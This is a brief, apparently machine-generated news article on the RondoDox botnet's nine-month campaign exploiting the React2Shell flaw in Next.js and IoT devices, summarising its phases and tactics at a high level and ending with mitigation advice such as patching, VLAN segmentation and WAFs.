Ethical Hacking News
The RondoDox botnet campaign has left a trail of destruction, hijacking IoT devices and web servers using the React2Shell flaw. With 90,300 susceptible devices worldwide, this nine-month-long campaign poses a significant threat to global cybersecurity. Stay ahead of the curve by learning how to mitigate the risks posed by RondoDox and protect yourself against emerging threats.
The RondoDox botnet has been linked to a nine-month-long campaign targeting IoT devices and web applications using the React2Shell flaw. Approximately 90,300 instances of devices remain susceptible to this vulnerability, with a significant presence in the US, Germany, France, and India. The botnet has added new N-day security vulnerabilities to its arsenal, including CVE-2023-1389 and CVE-2025-24893. The RondoDox campaign underwent three phases: reconnaissance, mass vulnerability probing, and automated deployment. The threat actors used tools to identify vulnerable servers, drop cryptocurrency miners, and kill non-whitelisted processes. Cybersecurity experts advise organizations to update Next.js, segment IoT devices, deploy WAFs, monitor for suspicious process execution, and block known C2 infrastructure.
In a shocking revelation, cybersecurity researchers have exposed a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications, enrolling them into a botnet known as RondoDox. The attack vector employed by the malicious actors was none other than the recently disclosed React2Shell flaw, which poses a critical security vulnerability in React Server Components (RSC) and Next.js, allowing unauthenticated attackers to achieve remote code execution on susceptible devices.
As of December 2025, statistics from the Shadowserver Foundation reveal that there are approximately 90,300 instances of devices remaining susceptible to this vulnerability, with 68,400 instances located in the United States, followed by Germany, France, and India. The RondoDox botnet campaign is a significant concern, as it has broadened its scale by adding new N-day security vulnerabilities to its arsenal, including CVE-2023-1389 and CVE-2025-24893.
According to CloudSEK's analysis, the RondoDox botnet campaign underwent three distinct phases prior to the exploitation of CVE-2025-55182. The initial reconnaissance and manual vulnerability scanning phase occurred between March and April 2025, followed by daily mass vulnerability probing of web applications like WordPress, Drupal, and Struts2, as well as IoT devices like Wavlink routers, between April and June 2025. Finally, the threat actors engaged in hourly automated deployment on a large scale, beginning in July and continuing until early December 2025.
The attacks detected in December 2025 revealed that the threat actors initiated scans to identify vulnerable Next.js servers, followed by attempts to drop cryptocurrency miners, a botnet loader and health checker, and a Mirai botnet variant on infected devices. One of the tools, "/nuts/bolts," was designed to terminate competing malware and coin miners before downloading the main bot binary from its command-and-control server. This tool had been found to remove known botnets, Docker-based payloads, artifacts left from prior campaigns, and associated cron jobs, while also setting up persistence using "/etc/crontab."
The threat actor's tactics continued with the use of a tool that continuously scanned /proc to enumerate running executables and killed non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors. This sophisticated approach underscores the severity of the RondoDox botnet campaign.
In light of this information, cybersecurity experts have offered advice on how to mitigate the risk posed by this threat. Organizations are urged to update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious process execution, and block known C2 infrastructure.
As the cybersecurity landscape continues to evolve, it is crucial that individuals and organizations remain vigilant and proactive in protecting themselves against emerging threats. The RondoDox botnet campaign serves as a stark reminder of the importance of staying informed about the latest vulnerabilities and exploits, as well as taking swift action to address them.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Devastating-Rise-of-RondoDox-A-Nine-Month-Long-Campaign-to-Hijack-IoT-Devices-and-Web-Servers-ehn.shtml
Published: Thu Jan 1 04:04:27 2026 by llama3.2 3B Q4_K_M
